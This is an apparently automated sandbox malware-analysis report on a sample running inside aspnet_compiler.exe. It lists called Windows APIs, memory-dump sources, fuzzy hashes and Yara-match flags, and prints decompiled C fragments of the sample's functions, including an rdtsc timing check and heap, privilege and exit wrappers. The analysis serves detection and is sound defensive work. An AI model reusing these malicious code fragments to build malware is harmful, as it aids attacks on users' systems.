0x00418725
0x00418729

APIs

NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01289910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128991A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99b20a3dcd8229d0b138a49aa25cc3750b80a2d0ed72209e66b53f60d89a72db
Instruction ID: 261edd90a4a777195f54ef4234f69453cb68994b95e4f80f7fde94b1afc55485
Opcode Fuzzy Hash: 99b20a3dcd8229d0b138a49aa25cc3750b80a2d0ed72209e66b53f60d89a72db
Instruction Fuzzy Hash: FD9002B121104802D64071AD45047460005A7D0341F51C011A5054554EC6998DD577B5

Uniqueness

Uniqueness Score: -1.00%

Function 012899A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012899AA

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1893a86695b41816ef6511322d7802dad687201347bbdcac5645dc615c55782c
Instruction ID: 4b5f0c995b7ea68632f8657dbe331c7df62a18d9ffdc96131df4dd9da9c696ef
Opcode Fuzzy Hash: 1893a86695b41816ef6511322d7802dad687201347bbdcac5645dc615c55782c
Instruction Fuzzy Hash: C89002A135104842D60061AD4514B060005E7E1341F51C015E1054554DC659CC527276

Uniqueness

Uniqueness Score: -1.00%

Function 01289860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128986A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ed3b6f50f604dd2cb4eb6a3f65745c02189aaf926bc30eb6ee98b6f9c0c756a
Instruction ID: d1d26d22201ad7e5714855f283422ce74ea3a7335975e53633dfd01196702ded
Opcode Fuzzy Hash: 5ed3b6f50f604dd2cb4eb6a3f65745c02189aaf926bc30eb6ee98b6f9c0c756a
Instruction Fuzzy Hash: B790027121104813D61161AD46047070009A7D0281F91C412A0414558DD6968D52B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128984A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 495017bb317a68e8a7f13dbc3957cfeea25f7aecd1103e3b276fbd06b198d4da
Instruction ID: e0a1fd070c05c18c2bd268853e37b7be594cf47e52bab704996cb86b00ad05b8
Opcode Fuzzy Hash: 495017bb317a68e8a7f13dbc3957cfeea25f7aecd1103e3b276fbd06b198d4da
Instruction Fuzzy Hash: D4900261252085525A45B1AD45045074006B7E0281791C012A1404950CC5669C56F771

Uniqueness

Uniqueness Score: -1.00%

Function 012898F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012898FA

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3c53834ffcce21b56256ae01badb431422ea63bbfca9190ecb6a2507853e27d
Instruction ID: 9df6aaa38acd3258ff4fcdc6e026050e581f4bf2496267432509d8d997d7d0b2
Opcode Fuzzy Hash: c3c53834ffcce21b56256ae01badb431422ea63bbfca9190ecb6a2507853e27d
Instruction Fuzzy Hash: 3D90026161104902D60171AD4504616000AA7D0281F91C022A1014555ECA658D92B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A2A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d48888cbff97348eaa24cc353c79514f9f4579c2e8002af2d4b7c33670f16a37
Instruction ID: 5e5e43f6798dd8cb72697c35e701a31515de4d5cfebefebc4b7e8126092e4efd
Opcode Fuzzy Hash: d48888cbff97348eaa24cc353c79514f9f4579c2e8002af2d4b7c33670f16a37
Instruction Fuzzy Hash: E090026161104442464071BD89449064005BBE1251751C121A0988550DC5998C6577B5

Uniqueness

Uniqueness Score: -1.00%

Function 01289A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A0A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e83da7a01436419310071130996826245898b0893d403f43f655d2183cd664d
Instruction ID: 576991d0ceaea275e8903a412ab1921f37979f544c1391bd188226a0e38c761b
Opcode Fuzzy Hash: 7e83da7a01436419310071130996826245898b0893d403f43f655d2183cd664d
Instruction Fuzzy Hash: 8490027121144802D60061AD491470B0005A7D0342F51C011A1154555DC6658C5176B1

Uniqueness

Uniqueness Score: -1.00%

Function 01289A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A5A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 833193361c244fe3f1e29cbd2836e0c3c9cea57f9b5d1753d288358d36825a33
Instruction ID: 6453066b417289cb97f0aaa5f77f336fffb61de313eca1de9c9d8078e86ea8ed
Opcode Fuzzy Hash: 833193361c244fe3f1e29cbd2836e0c3c9cea57f9b5d1753d288358d36825a33
Instruction Fuzzy Hash: 3C90026122184442D70065BD4D14B070005A7D0343F51C115A0144554CC9558C617671

Uniqueness

Uniqueness Score: -1.00%

Function 01289540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128954A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b20f02cee1705eecbb7ab31701fe5420bac7a03640a54179e304102ce548d33
Instruction ID: 076f5eb1be0439a962e38ff9f4c029e8e1c0cae7262416410cff852533966a9e
Opcode Fuzzy Hash: 8b20f02cee1705eecbb7ab31701fe5420bac7a03640a54179e304102ce548d33
Instruction Fuzzy Hash: C9900265221044030605A5AD07045070046A7D5391351C021F1005550CD6618C617271

Uniqueness

Uniqueness Score: -1.00%

Function 012895D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012895DA

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbe3432b2bdd0157e1328062a0ed72add559594de10c1bf2f8875daba86e5f40
Instruction ID: 3780100c082ff7efa4daa5cbb73506548c6fcc3829596cc46f3001a656fd950c
Opcode Fuzzy Hash: cbe3432b2bdd0157e1328062a0ed72add559594de10c1bf2f8875daba86e5f40
Instruction Fuzzy Hash: 459002A121204403460571AD4514616400AA7E0241B51C021E1004590DC5658C917275

Uniqueness

Uniqueness Score: -1.00%

Function 01289710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128971A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7555b1ffc71de4ffddbb37ec512d4a32f6153a5034b14869ab15e14ff964f889
Instruction ID: 99d8afedd5744a8dfc1395879c40f88e76662788a75bbdb3fd105cf9428736cf
Opcode Fuzzy Hash: 7555b1ffc71de4ffddbb37ec512d4a32f6153a5034b14869ab15e14ff964f889
Instruction Fuzzy Hash: D990027121104802D60065ED55086460005A7E0341F51D011A5014555EC6A58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 012897A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012897AA

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a15f42ebb1e5623ba5927eab4860a4419c6d3d42a9687a9d469598def4d20a4f
Instruction ID: e691067171bc0d227c19bc5b42614706ac5f49253a91f631c819b7e2408f5d44
Opcode Fuzzy Hash: a15f42ebb1e5623ba5927eab4860a4419c6d3d42a9687a9d469598def4d20a4f
Instruction Fuzzy Hash: BE90026131104403D64071AD55186064005F7E1341F51D011E0404554CD9558C567372

Uniqueness

Uniqueness Score: -1.00%

Function 01289780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128978A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37c60830dbdaa6b971f81233fea27411d96a444ca4495e24e571bef9062911f6
Instruction ID: 09c326399ff9cdf037e8cf80dfcbd3b101c01b3c02d5b1c6be7940af99dc4395
Opcode Fuzzy Hash: 37c60830dbdaa6b971f81233fea27411d96a444ca4495e24e571bef9062911f6
Instruction Fuzzy Hash: C990026922304402D68071AD550860A0005A7D1242F91D415A0005558CC9558C697371

Uniqueness

Uniqueness Score: -1.00%

Function 01289FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289FEA

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e91ae3e92e58a4ca55a0eb5c639099fce3468ae2a02c7ca63bee3798e8481d37
Instruction ID: 31ea8e7553e0eae5d9f0934a57ca9ad99b17186d54acdf2eeb735dc4580e08af
Opcode Fuzzy Hash: e91ae3e92e58a4ca55a0eb5c639099fce3468ae2a02c7ca63bee3798e8481d37
Instruction Fuzzy Hash: 3890027132118802D61061AD85047060005A7D1241F51C411A0814558DC6D58C917272

Uniqueness

Uniqueness Score: -1.00%

Function 01289660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128966A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c54e6ae5dbd60500586b6397c8b41247c9af06935a7dddc7af7264e3d10eb529
Instruction ID: 7115e7203d327d909a0caa1c2696f8c475988533c43e42100b7c40e618f26e4a
Opcode Fuzzy Hash: c54e6ae5dbd60500586b6397c8b41247c9af06935a7dddc7af7264e3d10eb529
Instruction Fuzzy Hash: 4090027121104C02D68071AD450464A0005A7D1341F91C015A0015654DCA558E5977F1

Uniqueness

Uniqueness Score: -1.00%

Function 012896E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012896EA

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e99d5a76a5e08125f264cdcf7793ef420dd50dd6ea7437e1da73c89a438f012
Instruction ID: 299958927149c7ca006bad74cb1ae4ca6fbc0841315f658ec8fc1d18038ef8ca
Opcode Fuzzy Hash: 2e99d5a76a5e08125f264cdcf7793ef420dd50dd6ea7437e1da73c89a438f012
Instruction Fuzzy Hash: 949002712110CC02D61061AD850474A0005A7D0341F55C411A4414658DC6D58C917271

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088C0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1b5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088cb
0x004088d3
0x004088d5
0x004088da
0x004088df
0x004088f2
0x004088f7
0x00408900
0x0040890c
0x0040891f
0x00408924
0x00408927
0x00408930
0x00408942
0x00408947
0x0040894c
0x00000000
0x00000000
0x0040894e
0x00408952
0x00000000
0x00000000
0x00408954
0x00000000
0x00408952
0x00408956
0x00408959
0x0040895f
0x00408961
0x0040896c
0x00408971
0x00408974
0x00408981
0x0040898c
0x0040898e
0x00408994
0x00408998
0x0040899b
0x0040899b
0x004089a2
0x004089a5
0x004089aa
0x004089b7
0x004088e6
0x004088e6
0x004088e6

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004188A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188b7
0x004188c2
0x004188cd
0x004188d1

APIs

RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD

Strings

&5A, xrefs: 004188C2, 004188CC

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &5A
API String ID: 1279760036-1617645808
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407280 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
Instruction ID: b237522831fa2f29c3a6f065e8e6a5a8a1bdd1e87b57dfaece1adfce5d1a8559
Opcode Fuzzy Hash: 417bc7ea1a1c6509765bd4add674484d9fdc0ffc6b77e07eddde595002402b40
Instruction Fuzzy Hash: DC018431A8022876E721AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA

Uniqueness

Uniqueness Score: -1.00%

Function 004188E0 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004188ef
0x004188f7
0x0041890d
0x00418911

APIs

RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418912 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00418912() {
				int _v0;
				intOrPtr _v4;
				void* _t7;
				void* _t12;
				void* _t17;
				intOrPtr _t24;

				asm("cld");
				asm("stc");
				_t17 = _t7;
				_push(_t12);
				_push(ss);
				 *((intOrPtr*)(_t12 - 0xe35f1b6)) = _t24;
				asm("sbb al, 0x55");
				_t9 = _v4;
				E004191D0(_t17, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess(_v0);
			}

0x00418912
0x00418913
0x00418915
0x00418916
0x00418917
0x00418918
0x0041891f
0x00418923
0x0041893a
0x00418948

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28776aac2f16ee3d67861dbfa65cfffec2a271453a3cee4f2503ce4ae176f1f6
Instruction ID: 792586ff773140c8e7ff75dde3ffbfcd1cfead3b17e2d01f8ecf357b642712cc
Opcode Fuzzy Hash: 28776aac2f16ee3d67861dbfa65cfffec2a271453a3cee4f2503ce4ae176f1f6
Instruction Fuzzy Hash: 34E04F71600208BFD720DB68CC89FD73B68EF48780F0444A4B9586B281CA70AA44C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A40 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a5a
0x00418a70
0x00418a74

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418920 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418923
0x0041893a
0x00418948

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948

Memory Dump Source

Source File: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 0128967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289694

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f34d2af30a5421c8267b3b85307e4637b6323f22658e8176bd1b3f6bcb3bf26a
Instruction ID: 4afdc38d2332c62cabf69f2b0908090e8fa429e6cf4ded6282929a16b5bc892c
Opcode Fuzzy Hash: f34d2af30a5421c8267b3b85307e4637b6323f22658e8176bd1b3f6bcb3bf26a
Instruction Fuzzy Hash: A4B09B719124D5C9DF11E7B44708737790077D0745F16C051D2020645B4778C4D1F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012FB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

